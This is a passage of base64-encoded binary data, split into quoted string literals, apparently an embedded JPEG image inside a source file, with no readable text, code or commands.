    "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"
    "Wjx7bdzy0ePdFp8tHj1drdnwLT5aPHq/"
    "l9q0vQurv5pr8dL0LrD1rndfGrx0vQuseWtc7r41eOj+"
    "YrrL51LnXdb1eOi6PHsC53vLV49pW95avHFvs643PLSucX2Br5PLSucPLQl117C53HziucHoXX"
    "psXazYPnFc6fHt7ZRYPnRSvsjJuXavZ2PYeD312R8/"
    "PMUXsP8Afsva18aL11l218t62+"
    "Pw1x1h8b1KX4YNYXrD43n8Sxguer34JjMLu0uK7MylKUXL37h49ofGCxm544ovZ7RrHxwfG3wU"
    "hBlL1mEJhCEIQmhHoRVg+"
    "NlQ9afR6w9nsWF6gkZTKZdtk0ZRopdvKcGYzDZDKQsGxMuHj0184e970ej1h7PePo9YPUsHp9n"
    "vBiPR66a1ilvZTKQhSmbSnhCYpY5tFMxmMw3ihdMeE3qUpS6LjMaXGiLgl6iIQhCYInT1xd6DI"
    "JD2YQgsGTBaqMXUVweOF+"
    "B86vHHyKUpcFq8hIaL096YIu81724QglteROp2kwu81szefT7qXOEYtt4VHoaIQhBaLueXTcw9"
    "a53mjLgmZimbRTMMglt+"
    "Ql0psuyufhg0e8PZ7PeCRN3yPfRqXdXPwUu5Rsmx5CfRPZfwIMpRbFwXOyyi/epR/"
    "CuPlhNcFteWm/sspfjQvohCEITdemi/Uo/mgvy3s38/MZvnn502cwn+W/qXH5z/AEqN/"
    "Ul+jCbV/Fb+ufqNbV/CvyUpdS/Wa279z4vVHt37Hz8T2V+0+NtfVfiu1P3IPbvz37J0y/"
    "I39cEugzdX5i56I/"
    "1kTozWqbCe+"
    "9KIQhCEIPbXPSHzu3eZBLClKUpSlKXanToTClKUpCEIIu15CWFKIgyEGQmNLrS6dClLglopS4N"
    "bflhNHlofO2uei3FP1Sl0LT/Vh/"
    "YyMm5RLCiWHlj5bMJopeh+"
    "WEIQhCEITS2f0bP7hRIm0tHjh5Ew8ibz5XPQWMXwPF8pbf8AUsfITwauLWwzMXBszGbCdDaOHm"
    "MxmMxmLuN7jP7ixLdePs94zosGsIJDFzuTb8vk8uoPlc7z218f96c+"
    "ZqotF94PjbW9dMF0ynJNLwSxoyFGQS22il2qUZ46l0yaGyiRMaImFEibrJgi62TW8Fg10iCKUZ"
    "NFHhR4L4fLHNjm0sZdLRw0+lZTKTBcZjMXRDKT4vLeWrx6Y+"
    "D39bHt0ojKZTKQyiXTV9r3fHqLYvxZqXUH+D/Nzx6c+BL19746zcF+FB7l6W3hCfh/"
    "3cXSWzkS/"
    "Gm4hdGYyCXe1+ZNxPoLGQymUykJhfyIPnplKUpcIMXH5E3L+vSlHoRS4NYwhCCL+RNy/"
    "pNlKXGEIQhCYUuuDRfyWQm0i/iUpSlHphCEFtshME/"
    "V0eXz0uilKXYZSlLouzRfbSlKXTCEIQnxwYucLgl8NKXD2RkZ7Iz2RkZGRns9/"
    "UmUuqlKUpSlKUun2ez2eyMhCfe+"
    "cUvieEJhmMxmMxmMxmM2nL8E3EZjMZjNpSJhCa6UpmMxmMxmMxmMxmMxmMxmL8dMxcMplMvxvD"
    "2e9MIQhNc+"
    "2HofAkTGYwhCEIQhCDWExa2PZ7PZ7PZ7KUpSlKUpSleCRCfNCbdKPQmLGb11wgljRkEvxGQhCE"
    "IQhCEEvpm9CEIQhNM3YTCH9iOClKXBL11Rk+"
    "alKXGEIQhOo0T2KJfC2UpSlwRCEJ1d8TClKUpRbNKUpcYQhCEF2CE1NCZmMxmMxmMxdCRlMpl7"
    "qv8AjD//xAAXEQEBAQEAAAAAAAAAAAAAAAARAMBg/9oACAEDAQE/Ado0R3jO9x//"
    "xAAUEQEAAAAAAAAAAAAAAAAAAADQ/9oACAECAQE/AXQn/"
    "8QAFhAAAwAAAAAAAAAAAAAAAAAAIcDQ/9oACAEBAAY/Amakw2D/"
    "xAAoEAADAAEEAgMBAQEAAgMAAAAAARExECAhUTBxQEFgUGGBcICRscH/2gAIAQEAAT8h/wDUu/"
    "uPQVfWxq/nG+HyJvsT4z8p5elfYnwufzzy/"
    "ltD71WV+eeXqz5D6bFkZ3n859jy9WjFXzLL868vYoGq+WJwar822kx5Fth/"
    "LZJCx+ay0yWbMhrn4TE9l2rC/"
    "MtzI9fGiGcjoRjR5aZ+"
    "A2lk5bFdFdbFhfmcNUtE46UHbt1UqT4H02LK1eXqsL8w8DbedVqm0cHLEJasvL83AN3YsrVpG9"
    "VhfmHh7EtFkeiVDjXD4UsrV4GyWiThfmHh7HwZFkev01TawLHkp6rIxZWzHRZX5h5LzSTheNon"
    "uS5WzDRZX5h5e772tG9VlfButmGiyvzDy/AlvZeFtLJy2Fp1sSrQsiab/"
    "LvL8k5VurRjVeD6aoeqWNuWmX5d5fwKbjxiHqsLZgZaZfl3l+"
    "BQpsaqgketELHmlhbMNcvy7y9rPvflqm0uBY8k9FhbMNU4PVz+"
    "WeXtZ9j3LWfY9FheSeiwtmGzD8s0ufM8vVYW6mtz0WFsw1Rh+"
    "WeH5nl6rC8v2FjZhqjD8uhLyvJ6rC8v324D0Rh+"
    "Xw8rw9VheX7CxsxHojH8viNTyPD1WFucK3VDPrT7bcRu6Jwx/"
    "MZ7Voz+21t186rC8c9PttfjZj+Yy2MW+eXqsLx0un22PLZn+"
    "elvnl6pqtz5FSk2fWn22NudmX5p5fjnl6rK3/"
    "Td9tjy9Vlfm3l6vGqcY92PL1WVv+mz60+2sHsWV+badb1Q9janl6rK3/"
    "TwTcyPXxsWF+chsmt1eXqsrf8ATwWGyi/"
    "Oq3IPO9n9hsedVlb2rsPrWeBqtUrgWLn887dux41xyemxZW70E7pTYJ0eHsy/"
    "QTjG7nSD0WRW6VdnBwyuzLkq70LolwclLQX+"
    "jEucCSWP0CVDjW7c6LK0cFW9OFIG0yjZBYX6JKZb4ZCXKHi4G7nVIgxJTwLV+"
    "kStokQpLpgbpPFka5KZ1NTRoyf0M0WFIYKNiVPrbCbMGRoTmlg3dibhfoLrB7EPOmGje3BnR4M"
    "awj2PHyR3+daD5Y0XG9rTDVF2LjV7ZtVvH5wr8i1d+AtPRyuxvs/"
    "0tJtHQlTG2eJS7Sg1HBW5P0d9j1RTjSPo5W1ZH4UTXOsP8zNGp52JmtGN6LOiXkXBnwpxEirRZ"
    "Pv+jQ9VIrsrsrs5BUpCvReB6ptYK70+"
    "35tDLpN723Bid0pbMa40ev21dK0jv8zwPZfD9DELX7bbBnXJS6LliDckkSMsr/BY/"
    "JXdTK6K6Jxgrorororororoaazqwpy50M7Jbapo0cjccZFWJccrRtLJRQ30LoOMlNH0R2J3H42"
    "c6UPY9j2Eop4kqMs7PYgKVIO1J4/Y/wDnT0PQoKlk9j3PoKIgh8caYfjW+jFkb6P+vLV2f8H/"
    "AAf8DXPCP+j/AKEuMCyL0P8Agi6E54R9nBx/g5PrReOUMrZz9U/6P+hJ3lC8EzmH/B/"
    "wKfX4yg1HNKCUU8jwex7HuODhxD1PQTqJoslHo+"
    "eT3GoQg9G4qeg3XdVKkPQ9D0KLVKxIvxjtSGSOhJLHlbUrsrsrsrVlIr0SQSSxpVG0G6UrsZtF"
    "PRDH+BHRHRHRHQ0miprkjoSS/GPA3dKRO+WqJwWMTFsGo96VLLHAvGiVF6LLucDVjRid/"
    "HPD2X20T0T+MZa4CgsssWT77voIaIIUCx+O+u2kOlaR35mPcm1JvBXRXRXQxPxZCap/jXhjd2/"
    "QyR8MTN+ZCW26rJIlPK0Q3RYX4xtLI0ngoutCpz4/"
    "qV96CrAy8IrororoTdCdoi60bSyR2Jp+PDRYX4p4PQavZfg1KHsTggeg4R6Cxq+eD0GrPYg/"
    "HgUQsfh6uyrs5OGVsRPi0RHRycLRH0UU0x9HJyiOibKu/BgJ/"
    "QWPwskjzuhC7EifBkkTq8bgQ0KhKIu7AgvwbxwNp9ld+"
    "R6xX4MdCpSFIrsdu3e8Fdjdycgklge9qixlDtvn+9JI1fk+x/"
    "JGm0WWNTdYkXiwHqmkhLj+y0RZfgngpONEph8h0SSSST5GqLHtsar+pA6a4+"
    "NXQrVv8tW3xvWRNIjv+c8Hoeg8+CeK7Fwz/Oebvh9Cn8t+eGV9758JP55OOER+Gvsq7/"
    "juXIUWN623yrJD+i6eR/7JrnanHRV9fNe+rs6GZ+JwcD/"
    "zWMScf1ODheFOFdlXf8FqvHCboWeAJUSL+tR7JpdiEi+dwFGfgLSvwccCSWP7CKPW+"
    "BNUvltpZOXwlQ2kYimdUrgWLn+"
    "1yDTWfG8fIncfIbaQ62yazwt6kqQpdiyKP7joSPa9ITVQLHxW5kjsr2Lx1DfRyRkZwPguxK4K6"
    "EuMf3pzjb73p85IE78J4KLG5c6XbRIwXRKk0umdUqK1kg/"
    "wLlZ1Q+RLSk2Jwbj4Taj52qTxNnOnA/"
    "8AN6fZEXX4RceSieOfgvL2Jzw0ui0mr1Snv+GoNR60XPhQ+hOq+"
    "Z2ntVPJHRHRHRHRHRHRHQqS41Q+"
    "NHt5BJL8bXw0vK3BqyyD0kkkkkkkkkkTo8PRFMbEzX4qc6J6WWLhDgkkkgt8lljZIaE+"
    "LAojCLLErJEjJJEjIpI1HooL30EovxiErRZZY3RDQ8iVHwWWWNVEPHhpQ01nX6atzeR8jTWfxU"
    "3Mkdja0QhHZHZGxWnztYR3nR6D/ApeN4HRRGEOii0+mv08DVJJHNE4yy/"
    "weGiWEkkkkkkk7YMWiDFqbNFCfC3kz0eBprJhp9Cnp9Cn4ouiLoi6IutBn9vwSU4MZcLytE5xo"
    "rb4EuMaM/sMvK8b/wDsQeuBBahKLSglFN7RHoL/"
    "ABpBnoeg3XRS7fwdHoeh6Hoeh6Ct48kBuvxu0+BbGJwcry46VlLrKI+hL/"
    "BJMfhY6OhEfQ+GDsRwflmqR1rV34MhZXw8hZX5+vqPwNJ5Hwx23z8JpPJ/+/"
    "xD8FC2vBXY9XOyuGvANt5FPC8MaMTvjukid2NuWZid2X8PI+"
    "hexuDVkIPWRqxNwxwNXoh4voQkKBPfC3wWW+"
    "BYjDY8MXBjsn4dcsWwxMdFFsNuUJWSYQ6ENGXlVt8FdDTWR0lyQ96tyFdDTWRYFjYtXA1MjLha"
    "Mb/"
    "EUh0rSOyOx05CnsjsevgWSOx6+NFat+"
    "DhonHT0E6qNxU9BOq7EqEjFipto9Cn4lqqHsew5Vut6HoPjjZ7nsLnn4WGyvsrf2Mr7E+"
    "clXZV2VdnH+DX2NzyyrsvOSrsq7Hln2/GMvtp/"
    "wBEfRH0JO4IuiLoi6+KlQkfiTh6GMglZ7Hsex7nsQ/GIWX5ueqniy/"
    "IsTE55RJ82c7XqwZJq0Ynfx7QfL2JfMi2FyMrM7sNq/E8A23kQ/"
    "4DkGms7sb1hfjIQ2off+E6Ej251exNwvxcBuskUfw2ungR97H5/ENpZEThnI4OV/"
    "Gcq3dNPsfOrRjVfhmiGrFxyQ/kNLoa5x46J8Ln8HRt18lJnMKu0VdlXZV3/IcrO27k46U/"
    "AtENWLjk9j2PY99C4Z6idV/jZI6OG89U2sFcz/"
    "fbfI23nSiuyuyuyuysgSfyR4LGprjemrSROrYl/SaJkkjV7GjJJ0YxYGqWWWWNGSJ1fx3Q86/"
    "WiPsa2J1/SgWWWN1iyJGSSSSSQYZZYsbpICZL+StXBXRWsIQex0rSO/"
    "4kEdkdkdkdjprjZCuiuiuhN15C1cFdFLRCEPZ9PjtkUVlZWUUUWJub2iLLLEzHh6XRnSbrGq+"
    "Y2yyyyyxu6pUkkkkn4ZqokSPZWN0Q18BuEEdkdld4ZNYTQTaAIOBX2V9lfZX2V9l28nJGRkZyX"
    "fSvs5OWR2R2Jp42x2R2R2R2R2R2R2R2R2R2R2Nu5K+"
    "yvsr70QQTQV0JuhcMEXRF0RdEXRPmVfZX2MvKIuvgvIM9xz9mGeh6Hoeh6Hoeh6bGqoew1HN9u"
    "l1uk0TxtGeh6HoehNlD3Fyz3HxzvUfR6nqeh6Hoeh6Hoeh6Hoeh6HoeguePhufo9D1G6z2PY9v"
    "hVdn10uhHcDXSI+"
    "if4eh6Hoeh6aUq7KuyrsifI0GukR9eKleznxR9CTuCOiCNCJyiOhJLSNY6I6I6I6I6I6I6I6I6"
    "I6OThCX+HoNf4Jc8o6ER9EfRH0R9EfRH0R9FNNNNNFdldldldldldldldldldldlDl/"
    "Rycojojr4qVZZfibhJI12ISG50eCxqeS6KUuxUWMT1cDVlkP4iVFllllllllllkH8mF42xtvOk"
    "dEdEdEdEdEdELY0nkaTyREdEChHWob+hXZXZXZXY3RD/KG4NWJ8iXxWiZJOuFllllln0Ri/"
    "HWU3vA6KL4MGWWWWWN1iVkkkkiUX5bkK0jsjsjsjsjsaQePkTuN+"
    "COyOyOyOxprRXRXRXRXRXQjv59jt5HC1a0WSCII9D0PQ9D0PQdqTZQ9j2PYn6eEXRF0RdEXRF1"
    "pF0NO4I+iPoj6I+hOOURdEXRF0Rdf+Acf+7n//"
    "2gAMAwEAAgADAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAABAADQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAA"
    "AAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAIAI"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIBAABAAAAAABAAABCAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAAABIAAAAAABBACAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAABIAAAIAAAAAAAAABiJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAPOQQAAAAAAAAAAAUgJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "ByABAAAAAAAAAADyAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIDBAIAAAAAAA"
    "BACJABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbIAAAAAAAAAAAYBAIAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIBnHJAIAAAAAAAARAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAABAC/"
    "aAAAAAAAABAAYBIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIBv5QAAIAAAAAAB"
    "HABBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJWwQIBAAAAAIACIAAIAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACr+"
    "QBAIABAABAAQwABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABBUeRQAAAAAABADi"
    "ULYJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALjwIAAAAABAAC2AxQAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAY2BABABAAAAAd6IAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAILGwACIAAAABAPlxAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAABAZ3QBQAAIAAIBl+"
    "ILQRIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAo3wAAAxAABAMjxBSKAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANGyAKJAIAAKAp+"
    "IKRRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIBteABQABAAAAMiABSKIAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIDjgALQAIAAAPJRAKRRAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAFMAAKIBAAAAEuBBQKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAABBlyAKRAAAAAB1wAKJBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAA3wBSAAAABAMsABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO2IABAKA"
    "AIB+"
    "wARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAXxAAIBAAAADmAACAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIBeIABAIAAAAfwABAIAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAABAP8AwACEwAAAA/"
    "ggQAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVHAAQCAAAAAmUSACAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZ4ACAQAAAAAwAACAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAACA+"
    "kAwCAAAAA2CACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPmkESAAAR6iQ"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/"
